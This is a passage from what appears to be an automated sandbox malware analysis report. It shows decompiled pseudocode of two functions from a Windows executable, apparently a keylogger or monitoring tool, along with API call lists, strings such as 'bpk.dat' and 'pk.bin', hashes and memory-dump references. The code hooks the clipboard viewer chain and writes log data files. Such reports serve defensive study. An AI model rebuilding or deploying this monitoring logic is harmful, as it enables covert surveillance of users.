						_t436 =  *((char*)(_t400 + 0x17dc));
						if( *((char*)(_t400 + 0x17dc)) != 0) {
							_push(_t396);
							L00414067(_t402 - 0x200, _t436);
							 *(_t402 - 4) = 0x15;
							L0043DE7A();
							 *(_t402 - 4) = 8;
							_t259 = L004140E9(_t402 - 0x200, _t436);
						}
					}
					 *(_t402 - 4) = 7;
					E0040E7E0();
					 *(_t402 - 4) = 6;
					L00404007(_t259, _t402 - 0x1080, _t400);
					 *(_t402 - 4) = 5;
					L00406845(_t402 - 0x1478, _t436);
					 *(_t402 - 4) = 4;
					E00422C65(_t402 - 0xc60);
					 *(_t402 - 4) = 3;
					E0041AA8D(_t402 - 0x1984, _t436);
					 *(_t402 - 4) = 2;
					E004197FA(_t402 - 0xe18);
					 *(_t402 - 4) = 1;
					E00422BD3(_t402 - 0xac4);
					 *(_t402 - 4) =  *(_t402 - 4) & 0x00000000;
					E00418ED0(_t402 - 0x3c4);
					 *(_t402 - 4) =  *(_t402 - 4) | 0xffffffff;
					_t196 = E0040D3F6(_t402 - 0x890);
					goto L48;
				}
				if( *((char*)(_t400 + 0x1805)) == 0) {
					_push(0x4558c8);
					_t379 = 0x4558c4;
					L0043DFCA();
				} else {
					_t303 =  *0x4550cc; // 0x0
					 *(_t402 - 0x188) = _t303;
					_t392 = 0x40;
					memset(_t402 - 0x187, 0, _t392 << 2);
					_t406 = _t406 + 0xc;
					_t379 = 0;
					asm("stosw");
					asm("stosb");
					if(ExpandEnvironmentStringsA(_t400 + 0x1808, _t402 - 0x188, 0x102) != 0) {
						_t379 = 0x4558c4;
						_push(_t402 - 0x188);
						L0043DDD2();
					}
					CreateDirectoryA( *0x4558c4, 0);
					_t396 = 0;
				}
				_push(_t379);
				 *((intOrPtr*)(_t402 - 0x18)) = _t406;
				_push("web.dat");
				_push(0x4558c4);
				_push(_t406);
				L0043DE20();
				 *(_t402 - 4) = 8;
				_t380 = L00414496(_t379);
				E00422B9F(_t380);
				_push(_t380);
				 *((intOrPtr*)(_t402 - 0x18)) = _t406;
				_push("bpkch.dat");
				_push(0x4558c4);
				_push(_t406);
				L0043DE20();
				E00422AFD( *((intOrPtr*)(_t400 + 0x60)));
				memcpy(_t400 + 0x17cc, _t402 - 0x35c, 4);
				if( *((char*)(_t400 + 0x17dc)) == 0) {
					L10:
					E00428249();
					goto L11;
				} else {
					_t414 =  *((char*)(_t400 + 0x17e8));
					if( *((char*)(_t400 + 0x17e8)) != 0) {
						goto L10;
					}
					E0042817C(_t400, _t414, 0x4550cc,  *((intOrPtr*)(_t400 + 0x1a14)));
					L11:
					_t415 =  *0x455aa4 - _t396; // 0x0
					if(_t415 != 0) {
						 *0x455aa4(GetCurrentProcessId(),  *(_t400 + 0x17e1) & 0x000000ff);
					}
					_t277 =  *((intOrPtr*)(_t400 + 0x2768));
					if(_t277 != _t396) {
						 *_t277( *(_t400 + 0x17e1) & 0x000000ff);
					}
					_t278 =  *((intOrPtr*)(_t400 + 0x275c));
					if(_t278 != _t396) {
						 *_t278( *(_t400 + 0x17de) & 0x000000ff);
					}
					_t279 =  *((intOrPtr*)(_t400 + 0x2760));
					if(_t279 != _t396) {
						_t279 =  *_t279( *(_t400 + 0x17ef) & 0x000000ff);
					}
					if( *(_t400 + 0x17e4) != 0 && ( *(_t400 + 0x17cc) & 0xffff7fff) == 0) {
						_push(0xffffffff);
						_push(0x40);
						_push(0xe027);
						L0043E2CA();
						 *(_t400 + 0x17e4) =  *(_t400 + 0x17e4) & 0x00000000;
					}
					if( *(_t400 + 0x17e2) != 0) {
						if(_t279 == 0) {
							_push(0xffffffff);
							_push(0x10);
							_push(0xe020);
							L0043E2CA();
						}
						 *(_t400 + 0x17e2) =  *(_t400 + 0x17e2) & 0x00000000;
					}
					if( *(_t400 + 0x17e3) != 0) {
						if(L004233EA(_t279, _t313, _t393, _t396, _t400) == 0) {
							_push(0xffffffff);
							_push(0x10);
							_push(0xe01f);
							L0043E2CA();
						}
						 *(_t400 + 0x17e3) =  *(_t400 + 0x17e3) & 0x00000000;
					}
					KillTimer( *(_t400 + 0x20), 0xe);
					if( *((char*)(_t400 + 0x17c9)) != 0) {
						SetTimer( *(_t400 + 0x20), 0xe, 0xea60, _t396);
					}
					KillTimer( *(_t400 + 0x20), 0x11);
					if( *((char*)(_t400 + 0x1a18)) != 0) {
						SetTimer( *(_t400 + 0x20), 0x11, 0xea60, _t396);
					}
					KillTimer( *(_t400 + 0x20), 0xf);
					if( *((char*)(_t400 + 0x17e5)) != 0) {
						SetTimer( *(_t400 + 0x20), 0xf, ( *(_t400 + 0x1d3c) * 0x3c +  *((intOrPtr*)(_t400 + 0x1d40))) * 0x3e8, _t396);
					}
					ChangeClipboardChain( *(_t400 + 0x20),  *(_t400 + 0x2738));
					 *(_t400 + 0x2738) = _t396;
					if( *((char*)(_t400 + 0x1d38)) != 0) {
						 *(_t400 + 0x2738) = SetClipboardViewer( *(_t400 + 0x20));
					}
					_t382 =  *((intOrPtr*)(_t400 + 0x60));
					if( *((char*)(_t400 + 0x17f9)) == 0) {
						__eflags =  *((char*)(_t382 + 0x44));
						if(__eflags != 0) {
							E0040F11F(_t382);
						}
					} else {
						_t434 =  *((char*)(_t382 + 0x44));
						if( *((char*)(_t382 + 0x44)) == 0) {
							E0040F0EB(_t382);
						}
					}
					_push("pk.bin");
					_push(0x4558c8);
					_push(_t402 - 0x14);
					L0043DE20();
					 *(_t402 - 4) = 0x14;
					E0040BC5C(_t313, _t434,  *((intOrPtr*)(_t402 - 0x14)));
					 *(_t402 - 4) = 8;
					L0043DD36();
					goto L44;
				}
			}

0x004223d1
0x004223d1
0x004223d6
0x004223e0
0x004223e7
0x004223ea
0x004223f1
0x00422ae3
0x00422ae8
0x00422af1
0x00422af1
0x004223f7
0x004223ff
0x00422400
0x00422405
0x0042240c
0x0042240f
0x00422414
0x0042241b
0x0042241f
0x00422424
0x0042242b
0x0042242f
0x00422434
0x0042243b
0x0042243f
0x00422444
0x0042244b
0x0042244f
0x00422454
0x0042245b
0x0042245f
0x00422464
0x0042246b
0x0042246f
0x0042247b
0x0042247f
0x00422493
0x0042249a
0x0042249e
0x004224a4
0x004224b4
0x004224c0
0x004224cc
0x004224d6
0x004224dc
0x004224e2
0x004224e8
0x004224ee
0x004224f4
0x004224fa
0x004224fd
0x00422502
0x00422507
0x00422508
0x0042250f
0x00422516
0x0042251a
0x00422522
0x00422526
0x00422534
0x0042253d
0x0042253e
0x00422545
0x0042254c
0x00422550
0x00422558
0x0042255c
0x0042256a
0x00422573
0x00422574
0x0042257b
0x00422582
0x00422586
0x0042258e
0x00422592
0x004225a0
0x004225a9
0x004225aa
0x004225b1
0x004225b8
0x004225bc
0x004225c4
0x004225c8
0x004225d6
0x004225df
0x004225e0
0x004225e7
0x004225ee
0x004225f2
0x004225fa
0x004225fe
0x0042260c
0x00422615
0x00422616
0x0042261d
0x00422624
0x00422628
0x00422630
0x00422634
0x00422642
0x0042264b
0x0042264c
0x00422653
0x0042265a
0x0042265e
0x00422666
0x0042266a
0x00422678
0x00422681
0x00422682
0x00422689
0x00422690
0x00422694
0x0042269c
0x004226a0
0x004226a5
0x004226aa
0x004226ad
0x004226b0
0x004226b3
0x004226be
0x004226d2
0x004226d6
0x004226da
0x004226df
0x004226e5
0x004226ea
0x004226eb
0x004226f1
0x004226f4
0x004226f7
0x004226f8
0x004226f9
0x00422704
0x00422709
0x00422710
0x00422718
0x0042271c
0x00422725
0x0042272c
0x00422737
0x0042273c
0x00422746
0x00422a18
0x00422a18
0x00422a1c
0x00422a27
0x00422a29
0x00422a30
0x00422a32
0x00422a39
0x00422a44
0x00422a48
0x00422a53
0x00422a57
0x00422a57
0x00422a30
0x00422a62
0x00422a66
0x00422a71
0x00422a75
0x00422a80
0x00422a84
0x00422a8f
0x00422a93
0x00422a9e
0x00422aa2
0x00422aad
0x00422ab1
0x00422abc
0x00422ac0
0x00422ac5
0x00422acf
0x00422ad4
0x00422ade
0x00000000
0x00422ade
0x00422753
0x004227b0
0x004227b5
0x004227ba
0x00422755
0x00422755
0x0042275c
0x00422762
0x0042276b
0x0042276b
0x0042276b
0x0042276d
0x0042276f
0x0042278b
0x00422793
0x00422798
0x00422799
0x00422799
0x004227a6
0x004227ac
0x004227ac
0x004227bf
0x004227c2
0x004227c5
0x004227ca
0x004227cf
0x004227d0
0x004227d5
0x004227de
0x004227e0
0x004227e5
0x004227e8
0x004227eb
0x004227f0
0x004227f5
0x004227f6
0x004227fe
0x00422813
0x00422822
0x00422841
0x00422841
0x00000000
0x00422824
0x00422824
0x0042282b
0x00000000
0x00000000
0x00422838
0x00422846
0x00422846
0x0042284c
0x0042285d
0x0042285d
0x00422863
0x0042286b
0x00422875
0x00422875
0x00422877
0x0042287f
0x00422889
0x00422889
0x0042288b
0x00422893
0x0042289d
0x0042289d
0x004228a6
0x004228b4
0x004228b6
0x004228b8
0x004228bd
0x004228c2
0x004228c2
0x004228d0
0x004228db
0x004228dd
0x004228df
0x004228e1
0x004228e6
0x004228e6
0x004228eb
0x004228eb
0x004228f9
0x00422904
0x00422906
0x00422908
0x0042290a
0x0042290f
0x0042290f
0x00422914
0x00422914
0x00422920
0x0042292d
0x0042293a
0x0042293a
0x00422945
0x00422952
0x0042295f
0x0042295f
0x0042296a
0x00422977
0x00422995
0x00422995
0x004229a4
0x004229b1
0x004229b7
0x004229c2
0x004229c2
0x004229cf
0x004229d2
0x004229e1
0x004229e5
0x004229e7
0x004229e7
0x004229d4
0x004229d4
0x004229d8
0x004229da
0x004229da
0x004229d8
0x004229ec
0x004229f4
0x004229f9
0x004229fa
0x00422a03
0x00422a07
0x00422a0f
0x00422a13
0x00000000
0x00422a13

APIs

__EH_prolog.LIBCMT ref: 004223D6

Part of subcall function 0040D26E: __EH_prolog.LIBCMT ref: 0040D273
Part of subcall function 0040D26E: #324.MFC42(00000075,?), ref: 0040D286
Part of subcall function 0040D26E: #567.MFC42(00000075,?), ref: 0040D2B3
Part of subcall function 0040D26E: #567.MFC42 ref: 0040D306
Part of subcall function 0040D26E: #500.MFC42 ref: 0040D31B
Part of subcall function 0040D26E: #540.MFC42 ref: 0040D32A
Part of subcall function 0040D26E: #540.MFC42 ref: 0040D339
Part of subcall function 0040D26E: #6142.MFC42(00000000,000000FF), ref: 0040D38D
Part of subcall function 0040D26E: CreateSolidBrush.GDI32(00EFEFEF), ref: 0040D39D
Part of subcall function 0040D26E: #1641.MFC42(00000000), ref: 0040D3A6

Part of subcall function 00418E5D: __EH_prolog.LIBCMT ref: 00418E62
Part of subcall function 00418E5D: #567.MFC42(00000078,?), ref: 00418E82

Part of subcall function 0042AF2E: __EH_prolog.LIBCMT ref: 0042AF33
Part of subcall function 0042AF2E: #567.MFC42(?,00000000,?,00422424,00000000), ref: 0042AF81
Part of subcall function 0042AF2E: #567.MFC42(?,00000000,?,00422424,00000000), ref: 0042AF99
Part of subcall function 0042AF2E: #567.MFC42(?,00000000,?,00422424,00000000), ref: 0042AFB0
Part of subcall function 0042AF2E: #384.MFC42(?,00000000,?,00422424,00000000), ref: 0042AFC1

Part of subcall function 00419770: __EH_prolog.LIBCMT ref: 00419775

Part of subcall function 0041AA04: __EH_prolog.LIBCMT ref: 0041AA09
Part of subcall function 0041AA04: #567.MFC42(000000AF,?), ref: 0041AA2C

Part of subcall function 00403ED5: __EH_prolog.LIBCMT ref: 00403EDA
Part of subcall function 00403ED5: #567.MFC42 ref: 00403F2A

memcpy.MSVCRT ref: 004224A4

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

Part of subcall function 0040D958: __EH_prolog.LIBCMT ref: 0040D95D

#800.MFC42 ref: 00422526

Part of subcall function 0040D958: #823.MFC42(00000010), ref: 0040D973
Part of subcall function 0040D958: #540.MFC42 ref: 0040D989
Part of subcall function 0040D958: #860.MFC42(?), ref: 0040D9A7
Part of subcall function 0040D958: #5860.MFC42(?,00000000,?), ref: 0040D9BC

#800.MFC42 ref: 0042255C
#800.MFC42 ref: 00422592
#800.MFC42 ref: 004225C8
#800.MFC42 ref: 004225FE
#800.MFC42 ref: 00422634
#800.MFC42 ref: 0042266A
#800.MFC42 ref: 004226A0

Part of subcall function 00422AF4: #1168.MFC42(004226AA), ref: 00422AF4

#537.MFC42(?), ref: 004226B3

Part of subcall function 00422B68: __EH_prolog.LIBCMT ref: 00422B6D
Part of subcall function 00422B68: #858.MFC42(?,004226C3,?), ref: 00422B80
Part of subcall function 00422B68: #800.MFC42(?,004226C3,?), ref: 00422B8C

#537.MFC42(?,?), ref: 004226E5
#922.MFC42(?,00000000,?,?,?,?), ref: 004226F9

Part of subcall function 00422B31: __EH_prolog.LIBCMT ref: 00422B36
Part of subcall function 00422B31: #858.MFC42(?,00422709,?,00000000,?,?,?,?), ref: 00422B49
Part of subcall function 00422B31: #800.MFC42(?,00422709,?,00000000,?,?,?,?), ref: 00422B55

#800.MFC42(?,00000000,?,?,?,?), ref: 00422710
#800.MFC42(?,00000000,?,?,?,?), ref: 0042271C

Part of subcall function 004221C8: #1168.MFC42(00000002,?,00420F0E,00000000,00000000,PKL Window), ref: 004221CC
Part of subcall function 004221C8: LoadImageA.USER32 ref: 004221F6
Part of subcall function 004221C8: DestroyIcon.USER32(00000000), ref: 00422214

#2514.MFC42 ref: 00422737
ExpandEnvironmentStringsA.KERNEL32(?,?,00000102), ref: 00422783
#860.MFC42(?), ref: 00422799

Part of subcall function 0040F11F: __EH_prolog.LIBCMT ref: 0040F124
Part of subcall function 0040F11F: KillTimer.USER32(?,?,?,?,?,?,?,0040F0B0), ref: 0040F144
Part of subcall function 0040F11F: #535.MFC42(?,?,?,?,?,?,?,0040F0B0), ref: 0040F162

CreateDirectoryA.KERNEL32(00000000), ref: 004227A6
#858.MFC42(004558C8), ref: 004227BA
#924.MFC42(?,004558C4,web.dat,?,004558C8), ref: 004227D0
#924.MFC42(?,004558C4,bpkch.dat,?,?,004558C4,web.dat,?,004558C8), ref: 004227F6
memcpy.MSVCRT ref: 00422813
GetCurrentProcessId.KERNEL32(?), ref: 00422856
#1199.MFC42(0000E027,00000040,000000FF), ref: 004228BD
#1199.MFC42(0000E020,00000010,000000FF), ref: 004228E6
#1199.MFC42(0000E01F,00000010,000000FF), ref: 0042290F
KillTimer.USER32(?,0000000E), ref: 00422920
SetTimer.USER32(?,0000000E,0000EA60,00000000), ref: 0042293A
KillTimer.USER32(?,00000011), ref: 00422945
SetTimer.USER32(?,00000011,0000EA60,00000000), ref: 0042295F
KillTimer.USER32(?,0000000F), ref: 0042296A
SetTimer.USER32(?,0000000F,?,00000000), ref: 00422995
ChangeClipboardChain.USER32(?,?), ref: 004229A4
SetClipboardViewer.USER32(?), ref: 004229BC
#924.MFC42(?,004558C8,pk.bin), ref: 004229FA
#800.MFC42(?,004558C8,pk.bin), ref: 00422A13
#2514.MFC42 ref: 00422A48

Strings

bpkch.dat, xrefs: 004227EB
web.dat, xrefs: 004227C5
pk.bin, xrefs: 004229EC
v$D, xrefs: 004223D1

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$H_prolog$#567$Timer$Kill$#1168#1199#537#540#858#924$#2514#860ClipboardCreateLoadmemcpy$#1641#324#384#500#535#5860#6142#823#922BrushChainChangeCurrentDestroyDirectoryEnvironmentExpandIconImageProcessSolidStringStringsViewer
String ID: bpkch.dat$pk.bin$v$D$web.dat
API String ID: 2857256436-81437182
Opcode ID: eadc3b15a2e80ed29484d289274490a3eed6a68b58234588f37229c3a068a9c0
Instruction ID: f2f248a0b11996a4997a722b9cb764c1f2a9b8a45637f394192b8b9a2d285391
Opcode Fuzzy Hash: eadc3b15a2e80ed29484d289274490a3eed6a68b58234588f37229c3a068a9c0
Instruction Fuzzy Hash: 90120770904398AADB25EBA5DD45BEEBBF4AF19304F04049EF149631C2DFB85B44CB25

Uniqueness

Uniqueness Score: -1.00%

Function 004201B7, Relevance: 70.2, APIs: 37, Strings: 3, Instructions: 237
stringCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 61%

			E004201B7(void* __ecx) {
				int _t92;
				signed int* _t97;
				signed int _t98;
				int _t140;
				intOrPtr _t142;
				intOrPtr _t145;
				void* _t147;
				char* _t149;
				void* _t188;
				void* _t191;
				void* _t193;
				void* _t199;
				void* _t201;
				intOrPtr* _t202;

				E0043E4E0(0x441ec0, _t199);
				_t202 = _t201 - 0x378;
				_t147 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x360)) - 1 == 0xffffffff) {
					L2:
					_t92 = 0;
				} else {
					E004206E8(__ecx);
					if( *((intOrPtr*)(_t147 + 0x360)) - 1 != 0xffffffff) {
						__imp__time(_t147 + 0x10, _t188, _t193);
						L0043E486();
						 *(_t199 - 4) = 0;
						L0043DDDE();
						 *(_t199 - 4) = 1;
						L0043DDD8();
						 *(_t199 - 0x38) =  *(_t199 - 0x38) | 0xffffffff;
						_push(0);
						 *(_t199 - 4) = 2;
						 *((intOrPtr*)(_t199 - 0x44)) = 0x445490;
						 *((intOrPtr*)(_t199 - 0x3c)) = 0;
						L0043DDD2();
						_push("bpk.dat");
						_t97 = _t199 - 0x1c;
						_push(0x4558c4);
						_push(_t97);
						 *(_t199 - 4) = 3;
						L0043DE20();
						_t98 =  *_t97;
						_push(_t199 - 0x44);
						_push(0x3001);
						_push(_t98);
						 *(_t199 - 4) = 4;
						L0043E480();
						asm("sbb al, al");
						 *(_t199 - 4) = 3;
						 *((char*)(_t199 - 0x11)) =  ~_t98 + 1;
						L0043DD36();
						if( *((char*)(_t199 - 0x11)) == 0) {
							E004205BC(_t147);
							 *((intOrPtr*)( *((intOrPtr*)(_t199 - 0x30)) + 0x30))(2);
							lstrcpynA(_t199 - 0x78, _t147 + 0x1c, 0x31);
							E00429085(_t199 - 0x78);
							 *_t202 = 0x105;
							lstrcpynA(_t199 - 0x180, _t147 + 0x4e, 0);
							lstrcpynA(_t199 - 0x384, _t147 + 0x152, 0x200);
							E00429085(_t199 - 0x180);
							E00429085(_t199 - 0x384);
							asm("movsw");
							asm("movsb");
							E00429085(_t199 - 0x10);
							_push(strlen(_t199 - 0x78));
							_push(_t199 - 0x78);
							L0043E47A();
							_push(strlen(_t199 - 0x10));
							_push(_t199 - 0x10);
							L0043E47A();
							_push(strlen(_t199 - 0x180));
							_push(_t199 - 0x180);
							L0043E47A();
							_push(strlen(_t199 - 0x10));
							_push(_t199 - 0x10);
							L0043E47A();
							_push(strlen(_t199 - 0x384));
							_push(_t199 - 0x384);
							L0043E47A();
							_push(strlen(_t199 - 0x10));
							_push(_t199 - 0x10);
							L0043E47A();
							_t191 = 0;
							_push(0);
							_push( *((intOrPtr*)(_t147 + 0x360)));
							L0043E462();
							_t149 =  *(_t147 + 0x35c);
							L0043DDD8();
							 *(_t199 - 4) = 6;
							_t140 = strlen(_t149);
							 *(_t199 - 0x1c) = _t140;
							if(_t140 > 0) {
								do {
									_t145 =  *((intOrPtr*)(_t191 + _t149));
									if(_t145 != 0xa) {
										_push(_t145);
										L0043E0C6();
									} else {
										_push("\r\n");
										L0043E0CC();
									}
									_t191 = _t191 + 1;
								} while (_t191 <  *(_t199 - 0x1c));
							}
							E00429085( *((intOrPtr*)(_t199 - 0x18)));
							_t142 =  *((intOrPtr*)(_t199 - 0x18));
							_push( *((intOrPtr*)(_t142 - 8)));
							_push(_t142);
							L0043E47A();
							L0043E474();
							_push(_t199 - 0x1c);
							L0043E276();
							 *(_t199 - 4) = 7;
							E0042AAFA( *(_t199 - 0x1c));
							 *(_t199 - 4) = 6;
							L0043DD36();
							_push(0xffffffff);
							_push(0);
							L0043E456();
							 *(_t199 - 4) = 3;
							L0043DD36();
							 *((intOrPtr*)(_t199 - 0x44)) = 0x445490;
							_push(1);
							 *(_t199 - 4) = 8;
							_pop(0);
						} else {
							 *((intOrPtr*)(_t199 - 0x44)) = 0x445490;
							 *(_t199 - 4) = 5;
						}
						L0043DD36();
						 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t199 - 0x44)) = 0x44547c;
						L0043E46E();
						_t92 = 0;
					} else {
						goto L2;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t199 - 0xc));
				return _t92;
			}

0x004201bc
0x004201c1
0x004201c8
0x004201d4
0x004201e7
0x004201e7
0x004201d6
0x004201d6
0x004201e5
0x004201f4
0x004201fe
0x00420208
0x0042020b
0x00420213
0x00420217
0x0042021c
0x00420225
0x00420229
0x0042022d
0x00420230
0x00420233
0x00420238
0x0042023d
0x00420240
0x00420245
0x00420246
0x0042024a
0x0042024f
0x00420254
0x00420255
0x0042025a
0x0042025e
0x00420262
0x00420269
0x00420270
0x00420274
0x00420277
0x00420280
0x00420290
0x0042029e
0x004202b1
0x004202b7
0x004202bf
0x004202ce
0x004202e3
0x004202ec
0x004202f8
0x00420305
0x0042030b
0x0042030c
0x00420320
0x00420324
0x00420325
0x00420334
0x00420338
0x0042033c
0x0042034e
0x00420355
0x00420359
0x00420368
0x0042036c
0x00420370
0x00420382
0x00420389
0x0042038d
0x0042039c
0x004203a0
0x004203a4
0x004203b5
0x004203b9
0x004203ba
0x004203bb
0x004203c0
0x004203c9
0x004203cf
0x004203d3
0x004203db
0x004203de
0x004203e0
0x004203e0
0x004203e5
0x004203f6
0x004203fa
0x004203e7
0x004203e7
0x004203ef
0x004203ef
0x004203ff
0x00420400
0x004203e0
0x00420408
0x0042040d
0x00420414
0x00420417
0x00420418
0x00420420
0x0042042b
0x0042042c
0x00420433
0x00420437
0x0042043d
0x00420444
0x00420449
0x0042044b
0x0042044f
0x00420457
0x0042045b
0x00420460
0x00420467
0x00420469
0x0042046d
0x00420282
0x00420282
0x00420285
0x00420285
0x00420471
0x00420476
0x0042047d
0x00420484
0x00420489
0x00000000
0x00000000
0x00000000
0x004201e5
0x00420491
0x00420499

APIs

__EH_prolog.LIBCMT ref: 004201BC

Part of subcall function 004206E8: #5857.MFC42(?,00000000,?,?,?,?,004201DB,?), ref: 004206FE
Part of subcall function 004206E8: strstr.MSVCRT ref: 00420715
Part of subcall function 004206E8: #5602.MFC42(00000000,00000001,?,?,004201DB,?), ref: 00420724
Part of subcall function 004206E8: strstr.MSVCRT ref: 00420737
Part of subcall function 004206E8: #5602.MFC42(00000000,00000001,004201DB,?), ref: 00420746
Part of subcall function 004206E8: #5602.MFC42(?,00000001,004201DB,?), ref: 0042075F
Part of subcall function 004206E8: #5602.MFC42(00000000,00000001,?,00000001,004201DB,?), ref: 0042077A

time.MSVCRT ref: 004201F4
#533.MFC42(?,?), ref: 004201FE
#350.MFC42(?,?), ref: 0042020B
#540.MFC42(?,?), ref: 00420217
#860.MFC42(00000000,?,?), ref: 00420233
#924.MFC42(?,004558C4,bpk.dat,00000000,?,?), ref: 0042024A
#5194.MFC42(?,00003001,?,?,004558C4,bpk.dat,00000000,?,?), ref: 00420262
#800.MFC42(?,00003001,?,?,004558C4,bpk.dat,00000000,?,?), ref: 00420277
lstrcpynA.KERNEL32(?,?,00000031,?,?), ref: 004202B1
lstrcpynA.KERNEL32(?,?,?,?,?), ref: 004202CE
lstrcpynA.KERNEL32(?,?,00000200,?,?), ref: 004202E3
strlen.MSVCRT ref: 00420315
#6392.MFC42(?,00000000,?,?,?,?), ref: 00420325
strlen.MSVCRT ref: 0042032E
#6392.MFC42(?,00000000,?,00000000,?,?,?,?), ref: 0042033C
strlen.MSVCRT ref: 00420348
#6392.MFC42(?,00000000,?,00000000,?,00000000,?,?,?,?), ref: 00420359
strlen.MSVCRT ref: 00420362
#6392.MFC42(?,00000000,?,00000000,?,00000000,?,00000000,?,?,?,?), ref: 00420370
strlen.MSVCRT ref: 0042037C
#6392.MFC42(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,?,?,?), ref: 0042038D
strlen.MSVCRT ref: 00420396
#6392.MFC42(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,?,?,?), ref: 004203A4
#5857.MFC42(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 004203BB
#540.MFC42(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 004203C9
strlen.MSVCRT ref: 004203D3
#941.MFC42(00453C48,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 004203EF
#940.MFC42(00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 004203FA
#6392.MFC42(?,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00420418
#1997.MFC42(?,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00420420
#3180.MFC42(?,?,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 0042042C
#800.MFC42(?,?,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 00420444
#6139.MFC42(00000000,000000FF,?,?,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 0042044F
#800.MFC42(00000000,000000FF,?,?,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 0042045B
#800.MFC42(00000000,000000FF,?,?,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 00420471
#798.MFC42(00000000,000000FF,?,?,?,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 00420484

Strings

bpk.dat, xrefs: 00420238
H<E, xrefs: 004202FD
|TD, xrefs: 0042047D

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #6392strlen$#5602#800$lstrcpyn$#540#5857strstr$#1997#3180#350#5194#533#6139#798#860#924#940#941H_prologtime
String ID: H<E$bpk.dat$|TD
API String ID: 1871987088-1240604741
Opcode ID: a3f9236ddc1aada8d76bc77e23f04c640a60815098b1144b35327f1d72508fd6
Instruction ID: 84e27b51fe6c8a6343205e31eee78ebf3679f404f2c61911a4476cd156bf7810
Opcode Fuzzy Hash: a3f9236ddc1aada8d76bc77e23f04c640a60815098b1144b35327f1d72508fd6
Instruction Fuzzy Hash: 8F917E72D0111CAADF15EBA6EC86EEEB7BCAF18304F50415EF511A7182DB386B09CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00426677, Relevance: 69.3, APIs: 46, Instructions: 335
timeCOMMON

Download Yara Rule

